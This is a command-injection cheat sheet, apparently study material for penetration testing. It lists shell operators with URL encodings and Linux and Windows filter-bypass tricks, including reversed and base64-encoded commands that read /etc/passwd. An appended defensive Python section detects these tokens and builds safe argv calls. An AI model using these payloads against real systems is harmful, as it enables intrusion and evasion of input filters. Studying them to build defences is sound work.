command-injections

🔧 Injection Operators

🧪 Semicolon

;       %3b       # → Executes both commands (Linux & Windows)

🔃 New Line

\n      %0a       # → Executes both commands (Linux & Windows)

🖼️ Background

&       %26       # → Executes both commands (second output usually appears first)

🧵 Pipe

|       %7c       # → Executes both commands (only second output is shown)

🟢 AND Operator

&&      %26%26    # → Executes second command only if first succeeds (Linux & Windows)

🔴 OR Operator

||      %7c%7c    # → Executes second command only if first fails (Linux & Windows)

🌀 Sub-Shell (Linux Only)

``       %60%60        # → Sub-shell execution (Linux-only)
$()      %24%28%29     # → Sub-shell execution (Linux-only)

🐧 Linux - Filtered Character Bypass

🔍 View Environment Variables

printenv         # Displays all environment variables

⛓️ Space Bypass

%09             # Use tab instead of space
${IFS}          # Replaced with space/tab (Not usable in sub-shells)
{ls,-la}        # Commas replaced with spaces

🔀 Other Character Bypass

${PATH:0:1}               # Replaced with /
${LS_COLORS:10:1}         # Replaced with ;
$(tr '!-}' '"-~'<<<[)     # Shift character by one ([ -> \)

⛔ Blacklisted Command Bypass

✒️ Character Insertion

' or "    # Must be even number of quotes
$@ or \   # Linux only

🔠 Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")   # Lowercase conversion and execution
$(a="WhOaMi";printf %s "${a,,}")   # Another lowercase technique

🔄 Reversed Commands

echo 'whoami' | rev     # Reverse string
eval $(rev<<<'imaohw')  # Execute reversed command

📦 Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64     # Encode with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # Execute base64 encoded command

📦 Windows - Filtered Character Bypass

🔍 View Environment Variables (PowerShell)

Get-ChildItem Env:      # View all environment variables

⛓️ Space Bypass

%09                     # Tab instead of space
%PROGRAMFILES:~10,-5%   # CMD: Replaced with space
$env:PROGRAMFILES[10]   # PowerShell: Replaced with space

🔁 Other Character Bypass

%HOMEPATH:~0,-17%    # CMD: Replaced with \

$env:HOMEPATH[0]     # PowerShell: Replaced with \

⛔ Blacklisted Command Bypass

✒️ Character Insertion

' or "       # Must be an even number of quotes

^            # Windows-only escape character (CMD)

🔠 Case Manipulation

WhoAmi                                 # Use odd case to bypass basic filters

🔄 Reversed Commands

"whoami"[-1..-20] -join ''             # Reverse string

iex "$('imaohw'[-1..-20] -join '')"    # Execute reversed command

📦 Encoded Commands

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # Encode command

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" # Decode & execute
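Added example, not part of this cheat sheet: a defender-side check that percent-decodes a request parameter (including double encoding) and reports which of the operators and bypass tokens listed above it contains, followed by the allow-list-plus-argv pattern that keeps a shell out of the call path entirely. The token names, HOST_RE and the ping wrapper are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote

# Operators and filter-bypass tokens from the cheat sheet above, in decoded
# form. Longer alternatives ("&&", "||") are listed before their
# one-character prefixes so each token is reported exactly once.
TOKEN_PATTERNS = [
    ("and_operator", r"&&"),
    ("or_operator", r"\|\|"),
    ("background", r"&"),
    ("pipe", r"\|"),
    ("semicolon", r";"),
    ("newline", r"\n"),
    ("tab", r"\t"),                                  # %09 space bypass
    ("subshell", r"\$\(|`"),                         # $( ) and backticks
    ("param_expansion", r"\$\{"),                    # ${IFS}, ${PATH:0:1}
    ("brace_expansion", r"\{[^{}\s]*,[^{}]*\}"),     # {ls,-la}
    ("cmd_substring", r"%[A-Za-z_]+:~-?\d+(?:,-?\d+)?%"),  # %PROGRAMFILES:~10,-5%
    ("ps_env_index", r"\$env:[A-Za-z_]+\["),         # $env:HOMEPATH[0]
    ("cmd_caret", r"\^"),
]
_TOKEN_RE = re.compile("|".join(f"(?P<{n}>{p})" for n, p in TOKEN_PATTERNS))

def normalize(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so %3b and double-encoded %253b both show ';'."""
    s = raw
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def find_injection_tokens(raw: str) -> list[str]:
    """Names of the cheat-sheet tokens present in the decoded input, in order of appearance."""
    return [m.lastgroup for m in _TOKEN_RE.finditer(normalize(raw))]

# Mitigation side (assumed ping wrapper, for illustration): allow-list the
# value and hand an argv list to subprocess.run(argv, shell=False). With no
# shell parsing the input, none of the operators above carries any meaning.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")

def ping_argv(host: str) -> list[str]:
    """Build the argv for `ping -c 1 <host>`; reject anything outside the allow-list."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("host rejected by allow-list")
    return ["ping", "-c", "1", host]
```

The detector is for logging and alerting on what a filter would have seen; the argv builder is the actual fix, since a deny-list of operators is exactly what the bypass sections above are written to defeat.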